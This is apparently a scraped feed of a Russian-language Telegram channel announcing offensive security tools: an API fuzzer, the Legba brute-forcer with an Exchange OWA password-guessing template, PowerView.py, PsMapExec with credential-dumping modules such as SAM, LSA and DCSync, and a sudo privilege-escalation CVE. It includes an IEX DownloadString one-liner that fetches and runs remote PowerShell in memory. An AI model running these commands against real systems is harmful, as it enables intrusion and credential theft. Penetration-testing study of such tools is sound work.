Whitehat Lab
2.08K subscribers
344 photos
393 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
🔄 😀 CATS v13.2.0 (Contract API Testing and Security)

Продвинутый REST API фаззер с высокой скоростью работы. Строит HTML отчеты по окончании. Очень подробная документация на официальном сайте. Написан на 💻 Java

Запуск в режиме black box:

cats --contract=openapi.yml -H "Authorization=$token" --server=https://api-url.com -b -k


Запуск в режиме context mode:

cats --contract=openapi.yaml --server=https://localhost:8080 --headers=headers.yml --refData=referenceData.yml


Запуск в режиме continuous fuzzing:

cats random --contract=openapi.yaml --server=https://localhost:8080 -H "API-KEY=$token" --mc 500 --path "/users/auth" -X POST --stopAfterTimeInSec 10


💻 Github
💻 Download
📔 Docs
📚 Тестируем Github API с CATS

#soft #cats #java #fuzzer

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
😎 Standoff 15

👍

#event #standoff

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥18🏆443
⌨️ MITRE ATT&CK Matrix v17.1

➡️ Site
➡️ Изменения
➡️ Json вариант

#mitre

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
🙃 HTB Certified Active Directory Pentesting Expert (HTB CAPE)

Как и обещал, выкладываю обзор
Вопросы автору можно задать в чате или комментариях

Недавно я завершил курс и успешно сдал экзамен HTB Certified Active Directory Pentesting Expert (CAPE) от Hack The Box Academy. Меня зовут Артём Метельков, я занимаюсь пентестами инфраструктуры и фишинг-атаками. В этом обзоре поделюсь своими впечатлениями и расскажу, что вас ждёт на пути к этой сертификации.

HTB CAPE - это чисто практическая штука. Тут не просто учат, а реально проверяют, как ты усвоил материал. Экзамен - это стенд с 10+ машинами, несколькими доменами и разными трастами между ними. В общем, всё как в реальной жизни.


🔗 Пентест AD на максималках, мой опыт HTB CAPE

Коротко о курсе:

Интенсивный обучающий курс, который охватывает широкий спектр техник и инструментов для проведения пентеста 💻 Active Directory. Курс не предназначен для начинающих в области кибербезопасности, а вот опытные специалисты смогут найти для себя много полезного

#htb #cert #exam

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
7🔥4👍1
🖥️ Legba v0.10.0

Быстрый брутфорсер с поддержкой большого количества протоколов, написан на Rust

AMQP
Cassandra/ScyllaDB
FTP
HTTP
IMAP
IRC
LDAP
MongoDB
MQTT
Microsoft SQL
MySQL
Oracle
PostgreSQL
POP3
RDP
Redis
Samba
SSH / SFTP
SMTP
Telnet
VNC


Установка:

cargo install legba


Пример HTTP basic auth:

legba http.basic \
--username admin \
--password wordlists/passwords.txt \
--target https://localhost:8888/


Поддерживает YAML в качестве шаблонов настройки

legba \
-R cookbook/http/ms-exchange/owa.yml \
-U users.txt \
-P passwords.txt \
"host=ms-server.local"


description: Microsoft Exchange bruteforce via OWA endpoint.
author: evilsocket
plugin: http
args:
target: "{$schema or https}://{$host}:{$port or 443}/owa/auth.owa"
http-method: POST
http-success-codes: 302
http-success-string: set-cookie
http-payload: destination={$schema or https}://{$host}:{$port or 443}/&flags=4&username={USERNAME}&password={PASSWORD}


💻 Repo
💻 Docs
💻 Recipes

#legba #soft #rust #brute

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥71
Forwarded from Похек
С праздником!
317
📱 Sakana AI

Будем посмотреть.
Родом из 🇯🇵 Японии

📌Примечание
Есть такая идея — Машина Гёделя: ИИ, который сам себя улучшает. Её в 2003-м придумал Юрген Шмидхубер. Названа в честь математика Курта Гёделя, который показал, что система не может доказать собственную непротиворечивость


🔗 https://sakana.ai/dgm/

#ai #sakana

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 Active Directory Kill Chain Attack & Defense

Большая подборка материалов по AD

💻 Repo

#windows #ad #pentest #redteam

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9
💻 evil-winrm-py 1.1.2

Аналог одноименной утилиты написанный на 😰 Python

Установка:

uv tool install --python 3.12 'git+https://github.com/adityatelange/evil-winrm-py'


💻 Repo
💻 Docs

#soft #python

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from SecuriXy.kz
🔍 NauthNRPC - новый способ enum’а пользователей домена без авторизации

Инструмент на Python, который использует MS-NRPC (Netlogon) с уровнем аутентификации auth-level = 1 (No Auth) для сбора информации о домене и перебора пользователей. Всё, что нужно - IP-адрес контроллера домена без логина, без пароля.

📌 Это аналог #kerbrute, но работает через RPC, и при переборе badPwdCount не увеличивается, что делает технику максимально stealth.

🔗 Research:
https://securelist.com/no-auth-domain-information-enumeration/112629/

🔗 Source:
https://github.com/sud0Ru/NauthNRPC

📎 Источник поста: https://t.iss.one/APT_Notes/1168

#netlogon #rpc #enum #redteam #ad #noauth
👍6
🔄🐍 PowerView v2025.1.0

Python реализация известного PowerView.ps1 скрипта
Отличный инструмент при пост эксплуатации 💻 Active Directory
Огромное количество возможностей и настроек, умеет в relay
Работает быстро и стабильно
Различные варианты аутентификации: pfx, kerberos, pth
Из последних фишек, поддержка веб интерфейса
Рекомендую! 🎩

Установка в uv:

uv tool install --python 3.12 git+https://github.com/aniqfakhrul/powerview.py --force


Использование:

powerview range.net/lowpriv:[email protected] --dc-ip 192.168.86.192

#with web
powerview range.net/lowpriv:[email protected] --dc-ip 192.168.86.192 --web


Некоторые примеры:

Add-ADComputer
Add-ADUser
ConvertFrom-SID
Get-Domain
Get-DomainCA
Get-DomainRBCD
Get-DomainTrust
Get-NetLoggedOn
Invoke-Kerberoast
Invoke-PrinterBug
Set-CATemplate
Set-DomainRBCD


💻 Home
📔 Wiki

#powerview #redteam #activedirectory #soft

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3👍221
🔄 💻 PsMapExec v0.8.1

Отличный инструмент для пост эксплуатации в 💻 Active Directory, написанный на PowerShell.

UPD. 0.8.1

Модуль SCCM переписан
Добавлен модуль DPAPI основанный на
SharpDPAPI


Текущая поддержка методов (протоколов):

🔵RDP
🔵SessionHunter
🔵SMB
🔵SMB Signing
🔵LDAP / LDAPS
🔵SSH
🔵Spraying
🔵VNC
🔵WinRM
🔵WMI
🔵MSSQL
🔵Kerberoast


Реализованные модули:

🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов
🔵 ConsoleHistory - история в PowerShell
🔵 Files - файлы в типичных директориях
🔵 KerbDump - дамп Kerberos билетов
🔵 eKeys - дамп ключей (Mimikatz)
🔵 LogonPasswords - дамп logon passwords (Mimikatz)
🔵 LSA - дамп LSA (Mimikatz)
🔵 NTDS - реализация DCsync
🔵 SAM - дамп SAM


Запуск из памяти:

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")


Примеры:

# Текущий пользователь
PsMapExec -Targets All -Method [Method]

# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput

# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]


💻 Github
📔 Documentation

#soft #pentest #powershell #psmapexec #redteam #windows

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Forwarded from GigaHackers (Oleg Labyntsev)
[LPE Linux CVE-2025-32643]

Всем привет! 👋

На днях вышла информация об уязвимости CVE-2025-32643. Баг позволяет в результате манипуляции опцией sudo -R (--chroot) повысить привилегии до root. 🚨

Нам удалось подтвердить PoC в нескольких версиях sudo.
1️⃣ На первом рисунке можете увидеть, что версия 1.9.14p2 подвержена уязвимости. Сначала от непривилегированного пользователя не могли смотреть каталог /root, а после эксплуатации спокойно смогли перечислить содержимое;

2️⃣ Аналогично на втором рисунке версия sudo 1.9.15p2 также подвержена уязвимости;

3️⃣А вот на третьем рисунке видно, что версия sudo 1.9.13p3 не подвержена недостатку, так как до версии 1.9.14 необходимой функциональности не было.

Подвержены версии sudo 1.9.14 - 1.9.17.
Для устранения недостатка достаточно обновить версию sudo до 1.9.17.p1
Подробнее о ресерче и приложенном PoC-е можно почитать здесь

#linux #pentest #LPE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 Kerbtool v0.1.1

Еще одна утилита для работы с Kerberos. Написана на🖼️ Go

--ask-tgt
--ask-st
--forge
--parse
--convert
--kerberoast


💻 Repo

#kerberos #ad #redteam #soft #golang

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
🔄💻 ADACLScanner v8.6

Инструмент для аудита разрешений в 💻 Active Directory, которые предоставлены через списки управления
доступом (ACL – Access Control List)

UPD
Added info for Windows 2022 and Windows 2025
Added Exchange Schema version 'Exchange Server 2019 CU10


Написан на 💻 PowerShell

SACL - список используемый для аудита доступа к данному объекту.
DACL - список указывающий права пользователей и групп на действия с данным объектом.

Разрешения, которые нам интересны 👍:

GenericAll - полные права на объект
GenericWrite - редактировать атрибуты объекта
WriteOwner - изменить владельца объекта
WriteDACL - редактировать ACE объекта
AllExtendedRights - расширенные права на объект
ForceChangePassword - сменить пароль объекта
Self - возможность добавить себя в группу


Работает в GUI или консольном режимах:

Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/canix1/ADACLScanner/refs/heads/master/ADACLScan.ps1' -OutFile ADACLScan.ps1

.\ADACLScan.ps1

.\ADACLScan.ps1 -Base (Get-ADRootDSE).defaultNamingContext -Owner -Scope subtree -Filter '(objectClass=*)' | Where-Object {$_.Access -eq 'Owner'}


Экспорт в xls, csv, html
Большое количество возможностей

💻 Home
😉 Active Directory ACL investigation
😉 Take Control Over AD Permissions

#adaclscanner #powershell #redteam #soft

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
1